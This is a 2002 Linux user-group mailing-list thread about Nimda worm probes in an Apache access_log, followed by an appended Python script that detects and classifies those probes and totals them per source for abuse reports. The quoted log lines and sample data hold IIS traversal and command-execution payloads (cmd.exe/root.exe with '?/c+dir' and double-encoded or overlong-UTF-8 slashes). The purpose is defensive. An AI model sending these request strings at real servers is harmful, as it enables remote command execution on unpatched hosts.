[plug] Anyone seen this particular attack pattern before?
Mike
erazmus at iinet.net.au
Thu Jan 17 23:36:16 WST 2002
maybe set up a script to email the 'responsibleperson at domain.???'
as a means to 'close the loop' and pro-act the dying out rather
than just wait for the normal exponential curve with dither ;)
Gee ain't quantum statistics great,
rgds
mike
At 11:17 AM 17/1/2002 +0800, you wrote:
>Apologies, I should have done more research. It's NIMDA.
>
>Anyone have an answer to NIMDA? Or is it just something we have to put up
>with until it dies out? I'm getting a few hundred hits a day.
>
>Alan
>----- Original Message -----
>From: Alan Graham <alan.graham at infonetsystems.com.au>
>To: <plug at plug.linux.org.au>
>Sent: Thursday, January 17, 2002 11:03 AM
>Subject: [plug] Anyone seen this particular attack pattern before?
>
>
>> I've just set up a web server on my firewall, to show some photos of the
>> kids to my folks in England. Within a few days, I started seeing this
>> attack. It comes in regularly, from a lot of different IPs, and it's
>> obviously aimed at NT IIS. Ha. I'm thinking it's a well known scripted
>> attack, or possibly a zombied attack? There's a pause of about 5 minutes
>> between each attack. The pisser is that most of the hosts appear to be
>> within iinet. I suppose I'd better let them know too.
>>
>> Can anyone tell me any more about it?
>>
>> Extract of access_log
>> "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-"
>> "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
>> "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
>> "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
>> "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
>> "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
>> "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
>> "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 337 "-" "-"
>> "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
>> "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
>> "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
>> "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
>> "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
>> "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
>> "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
>> "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
>>
>> Regards
>>
>> Alan Graham
>>
>>
>
>
>
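An added example, not from any poster in this thread: the sixteen request lines quoted above are the standard Nimda web-probe set. Two of them try the root.exe shell that Code Red II left in /scripts and /MSADC, two try the /c and /d virtual directories Code Red II mapped to the C: and D: drives, and the rest try to reach winnt/system32/cmd.exe by walking out of the web root with either overlong UTF-8 slashes (%c0%af, %c1%9c, the Unicode traversal bug) or a doubly encoded backslash (%255c, %%35%63, the double-decode bug). Against Apache they can only ever produce 404s or 400s, as in the extract. The script below parses combined-format access_log lines, models the two IIS decoding flaws well enough to see which requests would have escaped the web root, tags each request with the technique it uses, and totals probes per source address, which is the summary a "close the loop" mail to the responsible contact for each netblock would carry. The log lines are constructed from the quoted paths with placeholder addresses and timestamps, and the lenient decoder is an assumed simplification of the IIS behaviour, not its code.

```python
"""Spot Nimda-style IIS probes in an Apache access_log and summarise them per source."""
import re
from collections import defaultdict
from urllib.parse import unquote_to_bytes

# Constructed sample log in Apache combined format. The request lines are the ones
# quoted in the thread; the client addresses and timestamps are invented placeholders.
SAMPLE_LOG = """\
192.0.2.10 - - [17/Jan/2002:09:01:12 +0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 282 "-" "-"
192.0.2.10 - - [17/Jan/2002:09:01:13 +0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 280 "-" "-"
192.0.2.10 - - [17/Jan/2002:09:01:14 +0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 290 "-" "-"
192.0.2.10 - - [17/Jan/2002:09:01:15 +0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 304 "-" "-"
192.0.2.10 - - [17/Jan/2002:09:01:16 +0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
198.51.100.7 - - [17/Jan/2002:09:06:40 +0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
198.51.100.7 - - [17/Jan/2002:09:06:41 +0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 303 "-" "-"
198.51.100.7 - - [17/Jan/2002:09:06:42 +0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 287 "-" "-"
203.0.113.5 - - [17/Jan/2002:09:10:02 +0800] "GET /photos/kids.jpg HTTP/1.0" 200 48211 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*" (?P<status>\d{3})'
)
OVERLONG_RE = re.compile(r"%c[01]%[0-9a-f]{2}", re.IGNORECASE)


def parse_line(line):
    """Return (ip, method, target, status) for one combined-format line, else None."""
    m = LOG_RE.match(line)
    return (m["ip"], m["method"], m["target"], int(m["status"])) if m else None


def lenient_utf8(data):
    """Decode bytes the way the vulnerable IIS canonicaliser did (simplified model,
    assumed here): a 0xC0-0xDF lead byte plus the following byte is accepted as a
    two-byte sequence with no shortest-form check and no check that the second byte
    is a real continuation byte. Hence %c0%af -> '/', %c1%9c -> '\\' and even
    %c1%1c -> '\\'; a strict decoder rejects all three."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data):
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def canonicalise(target):
    """Return the path after one and after two rounds of decoding, '\\' folded to '/'.
    A server that decodes once, checks the path, then decodes again (the double-decode
    bug) effectively acts on the second form."""
    path = target.split("?", 1)[0]
    once = lenient_utf8(unquote_to_bytes(path))
    twice = lenient_utf8(unquote_to_bytes(once.encode("utf-8")))
    return once.replace("\\", "/"), twice.replace("\\", "/")


def escapes_webroot(path):
    """True if resolving the '..' segments climbs above the virtual root."""
    depth = 0
    for seg in path.split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg and seg != ".":
            depth += 1
    return False


def classify(target):
    """Tag one request target with the probe techniques it relies on."""
    tags = set()
    raw = target.split("?", 1)[0]
    once, twice = canonicalise(target)
    base = twice.rsplit("/", 1)[-1].lower()
    if base == "root.exe":
        tags.add("codered2-backdoor")      # cmd.exe copy left behind by Code Red II
    if base in ("root.exe", "cmd.exe") and "/c+" in target:
        tags.add("command-exec")           # "?/c+dir" runs a command via the shell
    if re.match(r"^/[cd]/winnt/", once, re.IGNORECASE):
        tags.add("drive-root-share")       # /c and /d virtual dirs mapped to C:\ and D:\
    if OVERLONG_RE.search(raw):
        tags.add("unicode-traversal")      # overlong UTF-8 slash, decoded leniently
    if "%" in once and once != twice:
        tags.add("double-decode")          # %255c -> %5c -> '\' on the second pass
    if escapes_webroot(twice):
        tags.add("escapes-webroot")
    return tags


def summarise(log_text):
    """Per-source counts of probe requests, the raw material for an abuse report."""
    report = defaultdict(lambda: {"probes": 0, "total": 0, "techniques": set()})
    for line in log_text.splitlines():
        parsed = parse_line(line)
        if not parsed:
            continue
        ip, _method, target, _status = parsed
        entry = report[ip]
        entry["total"] += 1
        tags = classify(target)
        if tags:
            entry["probes"] += 1
            entry["techniques"] |= tags
    return dict(report)


if __name__ == "__main__":
    for ip, e in sorted(summarise(SAMPLE_LOG).items()):
        print(f"{ip:15} {e['probes']}/{e['total']} probe requests  {sorted(e['techniques'])}")
```

Run it against a real access_log with `summarise(open("access_log").read())`; any source with a non-zero probe count is a Nimda-infected host, and the technique tags plus the matching raw lines are what the netblock's abuse contact needs to find the box. Note that the 400 responses in the extract are Apache refusing the malformed `%%35%63` and `%%35c` forms outright, while the 404s are well-formed requests for paths that simply do not exist on a Unix web root; neither does anything on Apache, and the script's "escapes-webroot" tag is about what IIS would have done with the same bytes, not what Apache did.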